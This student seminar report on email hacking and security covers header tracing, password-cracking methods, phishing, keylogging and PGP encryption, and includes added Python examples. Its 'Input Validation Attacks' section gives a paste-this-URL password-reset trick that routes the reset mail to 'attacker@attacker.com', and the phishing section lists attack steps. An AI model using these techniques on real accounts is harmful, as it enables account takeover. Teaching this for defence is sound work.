
Seminar Report On

Hacking and Securing E-Mail Accounts


For partial fulfillment of requirement of the degree of B.Tech in Computer Science (Session 2008-2012)

[Department of Computer Science]
Submitted To: Mr. Mukesh Kalla
Submitted By: Sudhir Pratap, VIII SEM CSE

MARWAR ENGINEERING COLLEGE & RESEARCH CENTER (Affiliated to Rajasthan Technical University, Kota)


Certificate
This is to certify that the seminar entitled Hacking and Securing E-Mail Account, presented by Mr. Sudhir Pratap in the 8th semester, is a bonafide work of his own, and is submitted in partial fulfillment of the requirement for the award of Bachelor's Degree in Computer Science and Engineering.

Guide: Mr. Mukesh Kalla

Acknowledgement
I take immense pleasure in thanking Mr. V. K. Bhansali (Director, MECRC, Jodhpur) for having permitted us to carry out this seminar work. We would also like to forward our sincere thanks to Mr. J. L. Kankariya (HOD, Computer Science Dept.) for his cooperation and helping us in earning this learning opportunity. I wish to express our deep sense of gratitude to Mr. Mukesh Kalla (CSE Dept.) for his able guidance and useful suggestions, which helped us in completing the seminar work, in time. Finally, yet importantly, we would like to express our heartfelt thanks to our beloved parents and teachers for their blessings and wishes for the successful completion of this seminar. Last, but not the least, I am also grateful to my friends for tirelessly and patiently pursuing me to complete this report without whose help completion of the Seminar report was the next thing to impossible.

Sudhir Pratap Singh Rathore

Abstract

Email is one of the most popular utilities of the Internet. Staying in touch with friends and relatives, closing business deals within minutes and forwarding mass emails to all addresses in the address book- are just a few common uses of email. Email has rapidly replaced snail mail in almost all domains and has become the preferred form of communication for most people. Unfortunately an email message is definitely not as harmless as it might seem at first glance. There are a lot of dangers, abuse and problems associated with the rapidly increasing popularity of email. Email has become ubiquitous, especially in the corporate world. Most businesses cannot survive without the use of email. In spite of the rapidly growing popularity of email as the preferred communication medium, very few people are actually aware of the numerous security risks involved. In the recent years, there has been an alarming increase in the number of email fraud cyber crime cases on the Internet. Hence, it has become extremely important for all businesses to take the necessary precautions to fight the menace of email fraud. Hacking email accounts, stealing sensitive data, copying the address book, intercepting data, virus infections, password attacks, spoofed messages, abusive emails, Trojan attacks and espionage are only some of the many concerns that have started affecting email users worldwide. Emails are also commonly being exploited by computer criminals to execute privacy and identity attacks on unsuspecting victims. Email Hacking-aims to educate and prepare email users against some of the most dangerous email related security loopholes, vulnerabilities and attacks.

Table of Contents

S.no. Topic
1. Introduction
2. Overview
3. Tracing E-Mail
4. Cracking E-Mail Account
5. Securing E-Mail
6. Conclusion
7. Bibliography

INTRODUCTION

Hacking is the process of attempting to gain, or successfully gaining, unauthorized access to computer resources for the purpose of mischievous or malicious use, modification, destruction or disclosure of those resources. The concept of hacking as a methodology to achieve some particular goal has the allusion of working at something by experimentation or empirical means, learning about the process under review or development by ad hoc mechanisms. This may have had an origin from the use of the term "v.t. to chop or cut roughly, i.e. to make rough cuts", as in the process of empirical development where numerous different routes are explored in a search for the most effective approach to a solution, but without necessarily having planned a prearranged ordering of search or necessarily a methodology for evaluation. To chance upon a solution through "hacking through a problem" is often as educational as structured learning, and thus it is not reasonable to approach a problem in a field which is devoid of structure and methodology by "hacking".

Hacker: A hacker is a person who is extremely interested in exploring the recondite workings of any computer system or networking system. Hackers are very gifted programmers: people who program enthusiastically, or who program rather than theorize about programming.

Ethical Hacker: Ethical hackers are security professionals who apply their hacking skills for defensive purposes on behalf of the owners of a system. One of the best ways to evaluate the intruder threat is to have independent computer security professionals attempt to break into the owners' computer systems; those professionals are called ETHICAL HACKERS.

Types of Hacker:

Hackers can be broadly classified on the basis of why they are hacking a system or why they are indulging in hacking. There are mainly three types of hacker on this basis:

Black-Hat Hacker:

Black hat hackers, or crackers, are individuals with extraordinary computing skills who resort to malicious or destructive activities. That is, black hat hackers use their knowledge and skill for their own personal gain, probably by hurting others.

White-Hat Hacker:

White hat hackers are those individuals professing hacker skills and using them for defensive purposes. This means that white hat hackers use their knowledge and skill for the good of others and for the common good.

Grey-Hat Hackers:

These are individuals who work both offensively and defensively at various times. We cannot predict their behavior. Sometimes they use their skills for the common good, while at other times they use them for their personal gain.

Why do people hack: There is an on-going debate about the definition of the word hacker. A hacker can be anyone with a deep interest in computer-based technology; it does not necessarily define someone who wants to do harm. The term attacker can be used to describe a malicious hacker. Another term for an attacker is a black hat. Security analysts are often called white hats, and white-hat analysis is the use of hacking for defensive purposes. Attackers' motivations vary greatly. Some of the most notorious hackers are high school kids in their basements planted in front of their computers looking for ways to exploit computer systems. Other attackers are disgruntled employees seeking revenge on a company. And still other attacks are motivated by the sheer challenge of penetrating a well-secured system. Common motives include:

Just for fun
Hack other systems secretly
Notify many people of their thoughts
Steal important information
Destroy the enemy's computer network during a war

Spite--Plainly stated, the cracker may dislike you. Perhaps he is a disgruntled employee from your company. Perhaps you flamed him in a Usenet group. One common scenario is for a cracker to crack an ISP with which he once had an account.
Sport--Perhaps you have been bragging about the security of your system, telling people it's impenetrable. Or worse, you own a brand-spanking-new system that the cracker has never dealt with before. These are challenges a cracker cannot resist.
Profit--Someone pays a cracker to bring you down or to get your proprietary data.
Politics--A small (but significant) percentage of crackers crack for political reasons. That is, they seek press coverage to highlight a particular issue.

Overview:

Most modern-day Internet users use standard e-mail clients (like Outlook Express, Microsoft Outlook, Opera etc.) to send and receive e-mail messages on the Internet. Such e-mail clients are not only very quick and easy to use, but also provide users with a variety of useful features. E-mail clients make it very easy for one to turn a blind eye to the linear working of the e-mail system. However, understanding how e-mail systems work is extremely important if one actually wants to be able to solve e-mail related threats. It is extremely important for an Internet user to understand how e-mail travels on the Internet. Unless one becomes familiar with the working of e-mail systems, it is impossible to counter such threats.

All e-mail communication on the Internet is governed by rules and regulations laid down by two different protocols:

1) Simple Mail Transfer Protocol (SMTP, port 25)
2) Post Office Protocol (POP, port 110)

Basically, the e-mail system is quite analogous to that of snail mail. Each time an e-mail has to be sent, the sender connects to a local mail server (post office) and uses predefined SMTP commands to create and send the e-mail. This local mail server then uses the SMTP protocol to route the e-mail through several other interim mail servers, until the e-mail finally reaches the destination mail server (post office). The recipient of the e-mail then connects to this destination post office server to download the received e-mail using predefined POP commands. The SMTP protocol is used to send e-mails, while the POP protocol is used to receive them.


Sender Outbox -> Source Mail Server -> Interim Mail Server -> Destination Mail Server -> Destination Inbox


Tracing E-mail

Each time one receives a cryptic e-mail, it is imperative that one follows the proper investigation process and tries to trace the source. One should follow the easy steps below and try to trace the source:

1) Open e-mail headers.
2) Identify the Internet Protocol (IP) address of the computer that was used to send the e-mail.
3) Trace the IP address to pinpoint the identity of the culprit.

Once the full e-mail headers of the suspect e-mail have been opened, one should then try to obtain the IP address of the source system that was used to send the e-mail. One of the most common techniques for finding the source IP address is to look for a header line such as:

X-Originating-IP: 210.62.15.92

Once the source IP address of the e-mail under scrutiny has been found, one should then try to trace it to gather as much information about it as possible. There are a number of different techniques that can be used to gather information or trace an IP address on the Internet, namely:

Reverse DNS Lookup
WHOIS
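
Steps 1 and 2 above as an added example (not part of the original report): it reads the X-Originating-IP header and the chain of Received headers from a constructed sample message and picks the most likely source address. The sample headers, host names and function names are assumptions made for illustration; only the X-Originating-IP value is taken from the text.

```python
import ipaddress
import re
from email import message_from_string

# Address ranges that never identify a sender on the public Internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Constructed sample: hosts, ids and dates are made up; only the
# X-Originating-IP value is the one quoted in the report.
SAMPLE = """\
Received: from mx.example.net (mx.example.net [198.51.100.7])
\tby inbox.example.org with ESMTP id abc123; Mon, 2 Apr 2012 10:15:02 +0000
Received: from webmail.example.net (webmail.example.net [10.0.4.12])
\tby mx.example.net with ESMTP id def456; Mon, 2 Apr 2012 10:15:00 +0000
X-Originating-IP: 210.62.15.92
From: someone@example.net
To: you@example.org
Subject: hello

body
"""

def parse(raw):
    """Parse raw message text (headers + body) into a Message object."""
    return message_from_string(raw)

def to_ip(text):
    """Return an ip_address for text like '1.2.3.4' or '[1.2.3.4]', else None."""
    try:
        return ipaddress.ip_address(text.strip().strip("[]"))
    except ValueError:
        return None

def is_external(ip):
    return not any(ip in net for net in INTERNAL_NETS)

def received_hops(msg):
    """IPs from the Received headers, ordered from the sender's side to ours.
    Every relay prepends its own header, so the header order is reversed."""
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        match = BRACKETED_IPV4.search(header)
        ip = to_ip(match.group(1)) if match else None
        if ip is not None:
            hops.append(str(ip))
    return hops

def candidate_source(msg):
    """Return (header_name, ip) for the most likely source address.
    Caveat: X-Originating-IP and every Received line below the one written
    by your own mail server are supplied by the sending side and can be
    forged, so the result is a lead to verify, not proof."""
    xoip = to_ip(msg.get("X-Originating-IP", ""))
    if xoip is not None and is_external(xoip):
        return ("X-Originating-IP", str(xoip))
    for hop in received_hops(msg):
        if is_external(ipaddress.ip_address(hop)):
            return ("Received", hop)
    return (None, None)

if __name__ == "__main__":
    message = parse(SAMPLE)
    print(received_hops(message))
    print(candidate_source(message))
```

The address returned here is what would then be passed to a reverse DNS lookup or a WHOIS query.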


Cracking E-Mail Accounts

E-Mail hacking is one of the most common attacks on the Internet. Almost all computer security enthusiasts, irrespective of their expertise level, are sure to have indulged in e-mail account cracking at some point of time or the other. As more and more people start depending upon e-mails for both official and personal subsistence, the threat of e-mail account cracking is only going to increase. The hugely critical role played by e-mail in today's world makes e-mail cracking all the more attractive from a criminal's point of view.

There are a few different techniques that are commonly used by attackers:

Password Guessing
Forgot Password Attacks
Brute Force Password Cracking
Phishing Attack
Input Validation Attack
Social Engineering
Key logging


Password Guessing:

Low threat level
Easily executed
Very common, but not very effective

Password guessing is one of the most commonly used password cracking techniques. In this attack, the attacker first gathers as much personal information about the victim as possible and then simply tries his luck by entering different combinations at the password prompt.

Forgot Password Attack:


Mid threat level
Easily executed
Not very effective

It can be labeled as an extension to the password guessing attack. All e-mail service providers have an option that allows users to reset or retrieve their e-mail account password by answering a few predefined questions. Ideally, e-mail service providers should ask users to enter only personal information to retrieve or reset the password. An attacker can easily find out such information without much trouble.


Brute Force Password Attacks:

High threat level
Very tedious and slow
Very effective

In this attack, an automatic tool or script tries all possible combinations of the available keyboard keys as the victim's password. Such a hit-and-trial method of trying out all available permutations and combinations means that, irrespective of the victim's password, it will sooner or later definitely be cracked. Due to the extremely high number of possible combinations of keystrokes, brute forcing can sometimes take an extremely long time to reach the correct password. The success and speed of this technique largely depend upon the strength of the victim's password.


Phishing:

Very high threat level
Easily executed
More effective

Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures. A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant of fishing, probably influenced by phreaking, and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.


A phishing attack can be executed in the following steps:

1) The attacker creates a fake screen that will be used to fool the victim. Usually such fake phishing screens can easily be created by editing the HTML code from the respective e-mail service provider's website.
2) Once the attacker has created the fake phishing screen, it has to be sent to the victim. The most common techniques used to send the fake screen to the victim are file attachments, HTML embedded e-mails, ActiveX enabled e-mails, HTA applications, physical access and many others.
3) Typically, the victim opens the fake screen and enters authentic e-mail account information. As soon as the victim clicks on the LOGIN button, this sensitive account information gets sent to the attacker.


Input Validation Attacks:


Very high threat level
Easily executed, not so common
Very effective

This attack allows an attacker to illegitimately reset the password of any victim without any proper authorization. This input validation loophole could easily be exploited to change the existing password of a user without any kind of information gathering and without even answering any secret hint question.

This attack can easily be executed in the following steps:

1) Open the internet browser.
2) Copy and paste the URL mentioned below into the address bar of the browser:

http://register.passport.net e-mailpwdreset.srf?lc=1033&em= victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

Simply press Enter and an e-mail will be sent to the attacker's e-mail address, which will allow the attacker to change the victim's password without entering any authorization.
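
The server-side view of this loophole, as an added example that is not part of the original report and is not the provider's code: a reset handler that mails the reset token to the address named in the request, beside a hardened one that only uses the recovery address stored for the account. That em names the account and prefem the mail recipient is an assumption read off the URL and the description above; the account store, recovery address, token lifetime and function names are constructed.

```python
import hashlib
import secrets
import time
from urllib.parse import parse_qs

# Constructed data: the recovery address on file is a made-up value.
ACCOUNTS = {"victim@hotmail.com": {"recovery": "victim.backup@example.org"}}
# Query string of the URL quoted in the report (stray space removed).
PAGE_QUERY = "lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1"
TOKEN_TTL = 15 * 60      # seconds a reset token stays valid (assumed policy)
GENERIC_REPLY = "If the account exists, a reset mail has been sent."
_tokens = {}             # sha256(token) -> (account, expiry); raw tokens are not stored

def _params(query):
    # keep_blank_values so the empty id= and cb= fields survive parsing
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def _clock(now):
    return time.time() if now is None else now

def _issue_token(account, now):
    token = secrets.token_urlsafe(32)
    digest = hashlib.sha256(token.encode()).hexdigest()
    _tokens[digest] = (account, _clock(now) + TOKEN_TTL)
    return token

def reset_vulnerable(query, outbox, now=None):
    """The flaw as described: the reset mail goes to the address in the request."""
    p = _params(query)
    account = p.get("em", "")
    if account in ACCOUNTS:
        recipient = p.get("prefem") or account   # client-controlled recipient
        outbox.append((recipient, _issue_token(account, now)))
    return GENERIC_REPLY

def reset_hardened(query, outbox, now=None):
    """Recipient comes from the server-side record; prefem is never read."""
    account = _params(query).get("em", "")
    record = ACCOUNTS.get(account)
    if record is not None:
        outbox.append((record["recovery"], _issue_token(account, now)))
    # Same reply either way, so the form does not confirm which accounts exist.
    return GENERIC_REPLY

def redeem(token, now=None):
    """Return the account a token may reset, or None. Single use, time limited."""
    digest = hashlib.sha256(token.encode()).hexdigest()
    account, expiry = _tokens.pop(digest, (None, 0))
    if account is None or _clock(now) > expiry:
        return None
    return account

if __name__ == "__main__":
    weak, strong = [], []
    reset_vulnerable(PAGE_QUERY, weak)
    reset_hardened(PAGE_QUERY, strong)
    print("vulnerable handler mails:", weak[0][0])
    print("hardened handler mails:  ", strong[0][0])
```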


Social Engineering:
Mid threat level
Ease of execution varies
Effectiveness varies

Social engineering is the art of talking to people in a persuasive and smooth manner in order to win their trust and then being able to make them reveal certain important bits of private information. An extremely large number of password cracking attacks on the Internet are executed using social engineering techniques.

Types of Social Engineering Attacks:

Impersonation
Intimidation
Real-life Social Engineering
Fake prompts


Keylogging:

Key logging, as the name suggests, is a way of recording every key pressed on a keyboard. It tracks the keystrokes in such a manner that the users do not come to know, or are unaware, that they are being monitored. Key logging can be done by means of either software or hardware. A software based keylogger needs to be installed on the victim's machine to monitor the keystrokes, and a hardware based one needs to be attached to the CPU. A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard. A keylogger can also record the victim's passwords; such programs are also called spy software. Not only passwords but all keystrokes of the victim can be recorded.

Types of Keylogger:

1) Hardware keylogger
2) Software keylogger

Hardware Keylogger: They can be connected directly to the keyboard's cable. The spy does not need actual access to the computer nor to turn it on; he just needs to be physically there. Anyone with access to your computer may install such devices secretly, and it's very hard to notice them. The main downside is that the spy can be caught if anyone finds out, for he needs to be physically there to both install and retrieve the keylogger.

Software Keylogger: The most common type of keylogger. If anyone has physical access to your computer, then it's a "piece of cake" to install a keylogger. That's the easier way, for if he is knowledgeable, he can also disable a given antivirus for that keylogger (so it doesn't interfere). Remote keylogging is very popular despite the numerous anti-virus programs out there that block them.


Securing E-Mail

Basic precautions that a user can take so that a hacker cannot easily hack the E-mail account:

Password should not be too short.
Try to use both uppercase and lowercase.
Try to use a combination of alphabets, numbers and special characters.
Keep changing your password.
Do not use the same password for all your accounts.
Use a secure internet connection.

Always use text.

Use additional multi-layered defenses.

Encrypt sensitive E-Mails.


Cryptography:

Until modern times cryptography referred almost exclusively to encryption, which is the process of converting ordinary information (called plaintext) into unintelligible gibberish (called cipher text). Decryption is the reverse, in other words, moving from the unintelligible cipher text back to plaintext. A cipher (or cypher) is a pair of algorithms that create the encryption and the reversing decryption. The detailed operation of a cipher is controlled both by the algorithm and in each instance by a "key". This is a secret parameter (ideally known only to the communicants) for a specific message exchange context. A "cryptosystem" is the ordered list of elements of finite possible plaintexts, finite possible cipher texts, finite possible keys, and the encryption and decryption algorithms which correspond to each key. Keys are important, as ciphers without variable keys can be trivially broken with only the knowledge of the cipher used and are therefore useless (or even counter-productive) for most purposes.


Encryption

In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called a cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key. The result of the process is encrypted information (in cryptography, referred to as cipher text). The reverse process, i.e., to make the encrypted information readable again, is referred to as decryption (i.e., to make it unencrypted). In many contexts, the word encryption may also implicitly refer to the reverse process, decryption e.g. software for encryption can typically also perform decryption. Encryption has long been used by militaries and governments to facilitate secret communication. It is now commonly used in protecting information within many kinds of civilian systems. For example, the Computer Security Institute reported that in 2007, 71% of companies surveyed utilized encryption for some of their data in transit, and 53% utilized encryption for some of their data in storage. Encryption can be used to protect data "at rest", such as files on computers and storage devices (e.g. USB flash drives). In recent years there have been numerous reports of confidential data such as customers' personal records being exposed through loss or theft of laptops or backup drives.


Background Information on Encryption:

Most modern day strong encryption algorithms rely on two different critical features to successfully encrypt data:

Mathematical Algorithm
Keys

The mathematical algorithm being used by an encryption system is nothing but a set of mathematical formulae that converts plaintext data into cipher text. However mathematical algorithms remain quite easy to reverse engineer and are also easily available on internet for free download. Thus modern day encryption systems not only rely on mathematical algorithms but also use keys to encrypt plaintext into cipher text.

Concept of Keys:

Keys are unique to each user and are randomly generated by the user himself. This means that the same piece of plaintext data, when encrypted using the same mathematical algorithm but with different keys, will generate two different sets of cipher text. Hence, an attacker can decrypt cipher text into plaintext only with the help of the correct key. The weakness of the encryption system can be resolved with the help of a set of two different keys, as follows:

Private Key
Public Key


Each user is assigned both a private key (used for decryption) and a public key (used for encryption). One makes his public key available to all users on the internet, while keeping his private key a closely guarded secret. Once your public key has been published on the internet, absolutely anyone can use it to send you encrypted e-mails. However, e-mails encrypted using your public key can only be decrypted with the help of your private key. Hence, nobody can intercept and decrypt an encrypted e-mail using your public key, without also having access to your private key. Such a system of encryption and decryption using corresponding public and private keys not only ensures that absolutely anyone can send encrypted e-mails to the recipient, but also makes sure that only an authorized recipient can decrypt and view e-mails. Most importantly, such a system solves the problem of securely transferring keys over the internet. This process can be recapitulated in the following manner:

Encryption: PLAINTEXT * (Algorithm + public key) = CIPHER TEXT
Decryption: CIPHER TEXT * (Algorithm + private key) = PLAINTEXT


Pretty Good Privacy:

Pretty Good Privacy (PGP) is a data encryption and decryption computer program that provides cryptographic privacy and authentication for data communication. PGP is often used for signing, encrypting and decrypting texts, E-mails, files, directories and whole disk partitions to increase the security of email communications. It was created by Phil Zimmermann in 1991. PGP and similar products follow the OpenPGP standard (RFC 4880) for encrypting and decrypting data. PGP cryptography system is not only very safe but is also very easy to implement and use. The working of PGP system can be explained in the following:
[Figure: Encryption]

[Figure: Decryption]


Conclusion

Hacking is a very broad discipline, which covers a wide range of topics. The complexity of hacking allows us only to scratch the surface of it. With increases in computer technology, as well as increases in integration of computers into everyday life, it is evident that there is a place for hackers in the future but finding where they will stand is something that only time can tell. Hacking caused an international problem when the United States government thought about using it as a weapon to derail Yugoslav war forces. No international solution can be proposed because the nations of the world do not have the same ideas, laws and punishments governing hacking. Hacking has the potential to disrupt the economy, create international tension and ruin the lives of ordinary citizens worldwide. The very technology that brought the world together (the computer), is now the central focus in a plague tearing the world apart.


Bibliography

Books:
1. Unofficial Guide to Ethical Hacking by Ankit Fadia
2. Network Security by Ankit Fadia
3. E-mail hacking by Ankit Fadia

Websites:
www.askjeeves.com
www.cert.org
www.hackingtruth.com
